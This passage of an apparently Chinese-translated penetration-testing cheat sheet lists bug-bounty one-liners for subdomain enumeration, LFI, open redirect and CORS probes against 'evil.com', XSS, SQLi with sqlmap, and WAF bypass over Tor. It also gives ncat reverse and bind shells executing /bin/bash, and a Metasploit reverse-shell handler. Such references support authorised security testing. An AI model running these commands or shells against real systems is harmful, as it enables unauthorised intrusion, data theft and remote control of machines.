.[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ## from Archive curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u ## from JLDC curl -s "https://jldc.me/anubis/subdomains/target.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ## from crt.sh curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u ## from ThreatMiner curl -s "https://api.threatminer.org/v2/domain.php?q=target.com&rt=5" | jq -r '.results[]' |grep -o "\w.*target.com" | sort -u ## from Anubis curl -s "https://jldc.me/anubis/subdomains/target.com" | jq -r '.' | grep -o "\w.*target.com" ## from ThreatCrowd curl -s "https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com" | jq -r '.subdomains' | grep -o "\w.*target.com" ## from HackerTarget curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" ## from AlienVault curl -s "https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&page=1" | grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u ## from Censys censys subdomains target.com ## from subdomain center curl "https://api.subdomain.center/?domain=target.com" | jq -r '.[]' | sort -u ``` **LFI：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:" ``` **开放重定向：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace 'http://evil.com' | while read host do;do curl -s -L $host -I | grep "http://evil.com" && echo -e "$host \033[0;31mVulnerable\n" ;done ``` ``` cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep "=" | dedupe | qsreplace 'http://example.com' | httpx -fr -title -match-string 'Example Domain' ``` ``` echo "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` **SSRF：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat urls.txt | grep "=" | qsreplace "burpcollaborator_link" >> tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr ``` **XSS：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` file=$1; key="API_KEY"; while read line; do curl https://api.knoxss.pro -d target=$line -H "X-API-KEY: $key" -s | grep PoC; done < $file ``` ``` cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev "\.(jpeg|jpg|png|ico|gif|css|woff|svg)$" | uro | grep = | qsreplace "" | httpx -silent -nc -mc 200 -mr "" ``` ``` cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep "URL" | cut -d '"' -f2 | sort -u | dalfox pipe ``` ``` echo target.com | (gau || hakrawler || waybackurls || katana) | grep '=' |qsreplace '">' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "" && echo "$host \033[0;31m" Vulnerable;done ``` ``` cat urls.txt | grep "=" | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht ``` ``` cat subs.txt | awk '{print $3}'| httpx -silent | xargs -I@ sh -c 'python3 http://xsstrike.py -u @ --crawl' ``` ``` echo http://testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '">' | freq ``` **隐藏目录：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -e 7z,archive,ashx,asp,aspx,back,backup,backup-sql,backup.db,backup.sql,bak,bak.zip,bakup,bin,bkp,bson,bz2,core,csv,data,dataset,db,db-backup,db-dump,db.7z,db.bz2,db.gz,db.tar,db.tar.gz,db.zip,dbs.bz2,dll,dmp,dump,dump.7z,dump.db,dump.z,dump.zip,exported,gdb,gdb.dump,gz,gzip,ib,ibd,iso,jar,java,json,jsp,jspf,jspx,ldf,log,lz,lz4,lzh,mongo,neo4j,old,pg.dump,phtm,phtml,psql,rar,rb,rdb,rdb.bz2,rdb.gz,rdb.tar,rdb.tar.gz,rdb.zip,redis,save,sde,sdf,snap,sql,sql.7z,sql.bak,sql.bz2,sql.db,sql.dump,sql.gz,sql.lz,sql.rar,sql.tar.gz,sql.tar.z,sql.xz,sql.z,sql.zip,sqlite,sqlite.bz2,sqlite.gz,sqlite.tar,sqlite.tar.gz,sqlite.zip,sqlite3,sqlitedb,swp,tar,tar.bz2,tar.gz,tar.z,temp,tml,vbk,vhd,war,xhtml,xml,xz,z,zip,conf,config,bak,backup,swp,old,db,sql,asp,aspx~,asp~,py,py~,rb~,php,php~,bkp,cache,cgi,inc,js,json,jsp~,lock,wadl -o output.txt ``` ``` ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json ``` **从 Wayback 搜索敏感文件：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` echo target.com | (gau || hakrawler || waybackurls || katana) | grep -color -E ".xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar" ``` **SQLi：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs && for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done ``` ``` findomain -t http://testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` **使用 TOR 绕过 WAF：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2comment ``` **CORS：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` echo target.com | (gau || hakrawler || waybackurls || katana) | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done ``` **原型污染：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` subfinder -d target.com -all -silent | httpx -silent -threads 100 | anew alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" ``` **查找 JS 文件：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i -E "\.js" | egrep -v "\.json|\.jsp" | anew js.txt ``` ``` while read -r url; do if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \ curl -s -I "$url" | grep -iq 'Content-Type:.*\(text/javascript\|application/javascript\)'; then echo "$url" fi done < urls.txt > js.txt ``` **隐藏参数：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat subs.txt | (gau || hakrawler || waybackurls || katana) | sort -u | httpx -silent -threads 100 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -Eiv '\.js$|([^.]+)\.js|([^.]+)\.js\.[0-9]+$|([^.]+)\.js[0-9]+$|([^.]+)\.js[a-z][A-Z][0-9]+$' | sed 's/.*/&=FUZZ/g'); echo -e "\e[1;33m$url\e[1;32m$vars";done ``` **提取 JS 中的敏感端点：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u ``` **SSTI：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` for url in $(cat targets.txt); do python3 tplmap.py -u $url; print $url; done ``` ``` echo target.com | gau --subs --threads 200 | httpx -silent -mc 200 -nc | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt && ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ``` **扫描 IP：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat my_ips.txt | xargs -L 100 shodan scan submit --wait 0 ``` **使用 Nuclei 截取屏幕截图：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -v ``` SQLmap 篡改脚本 – WAF 绕过： **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` sqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent ``` **Shodan CLI：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` shodan search Ssl.cert.subject.CN:"target.com" --fields ip_str | anew ips.txt ``` **Censys CLI：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` censys search "target.com" --index-type hosts | jq -c '.[] | {ip: .ip}' | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' ``` **下载 JS 文件：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` ## curl mkdir -p js_files; while IFS= read -r url || [ -n "$url" ]; do filename=$(basename "$url"); echo "Downloading $filename JS..."; curl -sSL "$url" -o "downloaded_js_files/$filename"; done < "$1"; echo "Download complete." ## wget sed -i 's/\r//' js.txt && for i in $(cat js.txt); do wget "$i"; done ``` **仅过滤 HTML/XML 内容类型以进行 XSS：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat urls.txt | grep "=" | grep "?" | uro | httpx -ct -silent -nc | grep -i -E "text/html|application/xhtml+xml|application/xml|text/xml|image/svg+xml" | cut -d '[' -f 1 | anew xml_html.txt ## using curl while read -r url; do if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \ curl -s -I "$url" | grep -iq 'Content-Type:.*text/\(html\|xml\)'; then echo "$url" fi done < urls.txt > xml_html.txt ``` **获取 favicon哈希值：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` curl https://favicon-hash.kmsec.uk/api/?url=https://test.com/favicon.ico | jq ``` **使用 `x8` 查找参数：** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` subdomain -d target.com -silent -all -recursive | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w parameters.txt -o output.txt' ``` **查找用于 XSS 的反射参数 –** [`xss0r`](https://raw.githubusercontent.com/xss0r/xssorRecon/refs/heads/main/reflection.py)： **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` python3 reflection.py urls.txt | grep "Reflection found" | awk -F'[?&]' '!seen[$2]++' | tee reflected.txt ``` ## 8. Miscellaneous 这里可以找到一堆随机内容。 **[`^ back to top ^`](#overview)** ### 8.1 有用的网站 * [jsonlint.com](https://jsonlint.com) – JSON 验证器和格式化器。 * [base64decode.org](https://www.base64decode.org) – Base64 解码和编码。 * [urldecoder.org](https://www.urldecoder.org) – URL 解码和编码。 * [bitly.com](https://bitly.com) – URL 缩短服务。 * [pastebin.com](http://pastebin.com/) – Pastebin。 * [getcreditcardnumbers.com](https://www.getcreditcardnumbers.com) – 虚拟信用卡信息。 * [offsec.tools](https://offsec.tools/) – 渗透测试工具集合。 * [github.com/mthcht/awesome-lists](https://github.com/mthcht/awesome-lists/tree/main) – 大量安全列表集合。 ### cURL **[`^ back to top ^`](#overview)** 下载文件： ``` curl [somesite.com/somefile.txt](https://somesite.com/somefile.txt) -o somefile.txt ``` 上传文件： ``` curl [somesite.com/uploads/](https://somesite.com/uploads/) -T somefile.txt ``` | 选项 | 描述 | | --- | --- | | -d | 以 POST 请求向 HTTP 服务器发送指定数据 | | -H | 在向服务器发送 HTTP 请求时添加额外的请求头 | | -i | 在输出中包含 HTTP 响应头 | | -k | 继续并操作不受信任的服务器连接 | | -o | 将输出写入文件而不是标准输出 | | -T | 将指定本地文件传输到远程 URL，类似于 PUT 方法 | | -v | 使操作输出更详细 | | -x | 使用指定的代理（protocol://host:port） | | -X | 指定与 HTTP 服务器通信时要使用的自定义请求方法 | ### Ncat **[`^ back to top ^`](#overview)** 设置服务器监听： ``` ncat -nvlp 9000 ncat -nvlp 9000 > received_data.txt ncat -nvlp 9000 -e /bin/bash ncat -nvlp 9000 -e /bin/bash --ssl ncat -nvlp 9000 --ssl-cert crt.pem --ssl-key key.pem ncat -nvlp 9000 --keep-open <<< "HTTP/1.1 200 OK\r\n\r\n" ``` 客户端连接到远程主机： ``` ncat -nv 192.168.8.5 9000 ncat -nv 192.168.8.5 9000 < sent_data.txt ncat -nv 192.168.8.5 9000 -e /bin/bash ncat -nv 192.168.8.5 9000 -e /bin/bash --ssl ncat -nv 192.168.8.5 9000 --ssl-cert crt.pem --ssl-key key.pem ``` 检查到指定 TCP 端口（例如 22 或 23）的连接是否可能： ``` for i in {0..255}; do ncat -nv "192.168.8.${i}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done for ip in $(cat ips.txt); do ncat -nv "${ip}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done ``` #### 端口扫描器 **[`^ back to top ^`](#overview)** 单个端口： ``` nc -nvz 192.168.1.23 80 ``` 端口范围： ``` nc -vnz 192.168.1.23 0-1000 ``` #### 发送文件 **[`^ back to top ^`](#overview)** 服务器： ``` nc -lvp 1234 > file_name_to_save ``` 客户端： ``` nc -vn 192.168.1.33 1234 < file_to_send ``` #### 执行远程脚本 **[`^ back to top ^`](#overview)** 服务器： ``` nc -lvp 1234 -e ping.sh ``` 客户端： ``` nc -vn 192.168.1.33 1234 ``` #### 聊天与加密 **[`^ back to top ^`](#overview)** 服务器： ``` ncat -nlvp 8000 --ssl ``` 客户端： ``` ncat -nv 192.168.1.33 8000 ``` #### 横幅抓取 **[`^ back to top ^`](#overview)** 请求： ``` nc target port HTTP_Verb path http/version Host: url ``` 响应： ``` nc [www.bla.com](https://www.bla.com).br 80 HEAD / HTTP/1.0 Host: [www.bla.com](https://www.bla.com).br ``` #### HTTPS-OpenSSL **[`^ back to top ^`](#overview)** 如果网站使用 HTTPS，你需要使用 openssl： ``` openssl s_client -quiet [www.bla.com](https://www.bla.com).br:443 ``` #### 捕获 Shell **[`^ back to top ^`](#overview)** 打开监听器以捕获 Shell： ``` rlwrap nc -nlvp 4444 # or nc -nlvp 4444 ``` ### multi/handler **[`^ back to top ^`](#overview)** 设置监听器（根据需要更改 PAYLOAD、LHOST 和 LPORT）： ``` msfconsole -q use exploit/multi/handler set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.8.185 set LPORT 9000 exploit ``` ### ngrok **[`^ back to top ^`](#overview)** 使用 [ngrok](https://ngrok.com/download) 为本地 Web 服务器提供公网地址，但不要长时间暴露未加固的 Web 服务器，以免产生安全风险。 ### Simple Web-Server **[`^ back to top ^`](#overview)** Python Web 服务器： ``` python3 -m http.server 8081 ``` PHP Web 服务器： ``` php -S 0.0.0.0:8081 ``` ### SSH **[`^ back to top ^`](#overview)** 通过 SSH 连接： ``` ssh -o StrictHostKeyChecking=no -T root@ ``` 创建名为 `test` 的私钥和公钥： ``` ssh-keygen -t rsa -b 4096 -f test ``` 有时泄露的 SSH 密钥会导致错误，例如 `Load key "id_rsa": error in libcrypto`。这通常可以通过简单的清理来修复。 较新版本的 SSH 可能会对 RSA 提出警告。可以通过在 `~/.ssh/config` 中添加以下内容来修正： ``` HostKeyAlgorithms +ssh-rsa PubkeyAcceptedAlgorithms +ssh-rsa ``` ### swaks **[`^ back to top ^`](#overview)** 使用 [swaks](https://github.com/jetmore/swaks) 发送邮件： ``` swaks -f ${MAIL_FROM} -t ${MAIL_TO} -s ${MAIL_SMTP} --auth-user=${MAIL_AUTH} --auth-password=${MAIL_PASS} -tlsc -p ${MAIL_PORT} --body ${EMAIL} --header "Subject: Bruteforce Report" --add-header "Content-Type: text/plain; charset=UTF-8" --h-From: '"Cloud Storage" <'${MAIL_FROM}'>' ``` 使用 [swaks](https://github.com/jetmore/swaks) 快速发送测试邮件： ``` swaks -f ${MAIL_FROM} -t ${MAIL_TO} -s ${MAIL_SMTP} -auth-user=${MAIL_AUTH} --auth-password=${MAIL_PASS} -tlsc -p ${MAIL_PORT} --body "TEST" --header "Subject: Mail Test" ``` ### xfreerdp **[`^ back to top ^`](#overview)** 基于 Kerberos 的 Windows 目标简单用户枚举： ``` xfreerdp /v: -sec-nla /u:"" xfreerdp /v:192.168.0.32 -sec-nla /u:"" ``` 登录： ``` xfreerdp /u: /g: /p: /v: xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34 ``` ### Additional References **[`^ back to top ^`](#overview)** 致谢作者！ * [book.hacktricks.xyz](https://book.hacktricks.xyz/welcome/readme) * [infosecmatter.com/bug-bounty-tips](https://www.infosecmatter.com/bug-bounty-tips) * [pentestbook.six2dez.com](https://pentestbook.six2dez.com)

标签：Cloudflare, Cutter, meg, MITRE ATT&CK, XML 请求, 代码技巧, 信息安全, 可视化界面, 安全备忘, 安全开发, 安全测试, 报告编写, 攻击性安全, 日志审计, 渗透测试框架, 白帽黑客, 网络安全, 逆向工具, 速查表, 防御, 隐私保护